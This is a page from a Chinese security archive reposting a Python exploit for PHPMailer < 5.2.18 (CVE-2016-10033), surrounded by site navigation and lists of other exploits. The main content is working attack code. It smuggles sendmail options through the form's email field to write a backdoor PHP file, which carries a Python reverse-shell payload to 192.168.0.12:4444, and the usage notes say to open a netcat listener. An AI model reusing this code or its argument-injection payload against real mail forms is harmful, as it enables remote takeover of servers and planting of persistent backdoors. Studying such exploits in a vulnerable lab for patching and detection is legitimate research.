首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHPMailer < 5.2.18 - Remote Code Execution (Python) 来源：anarcoder at protonmail.com 作者：anarc0der 发布时间：2016-12-30   """ # Exploit Title: PHPMailer Exploit v1.0 # Date: 29/12/2016 # Exploit Author: Daniel aka anarc0der # Version: PHPMailer < 5.2.18 # Tested on: Arch Linux # CVE : CVE 2016-10033   Description: Exploiting PHPMail with back connection (reverse shell) from the target   Usage: 1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033 2 - Config your IP for reverse shell on payload variable 4 - Open nc listener in one terminal: $ nc -lnvp <your ip> 3 - Open other terminal and run the exploit: python3 anarcoder.py   Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU   Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html """   from requests_toolbelt import MultipartEncoder import requests import os import base64 from lxml import html as lh   os.system('clear') print("\n") print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ") print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗") print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝") print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗") print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║") print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝") print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")   target = 'http://localhost:8080' backdoor = '/backdoor.php'   payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>' fields={'action': 'submit',         'name': payload,         'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',         'message': 'Pwned'}   m = MultipartEncoder(fields=fields,                      boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')   headers={'User-Agent': 'curl/7.47.0',          'Content-Type': m.content_type}   proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}     print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target, data=m.to_string(),                   headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target+backdoor, headers=headers) if r.status_code == 200:     print('[+]  ExPLoITeD ' + target)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SwiftMailer < 5.4.5-DEV - Remo ·Zend Framework / zend-mail < 2 ·PHPMailer < 5.2.18 - Remote Co ·Xfinity Gateway (Technicolor D ·PHPMailer < 5.2.20 - Remote Co ·Internet Download Accelerator ·Android get_user/put_user Expl ·PHPMailer < 5.2.20 / SwiftMail ·PHPMailer 5.2.17 - Remote Code ·PHPMailer Sendmail Argument In ·FTPShell Server 6.36 - '.csv' ·Zyxel/Eir D1000 DSL Modem NewN   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved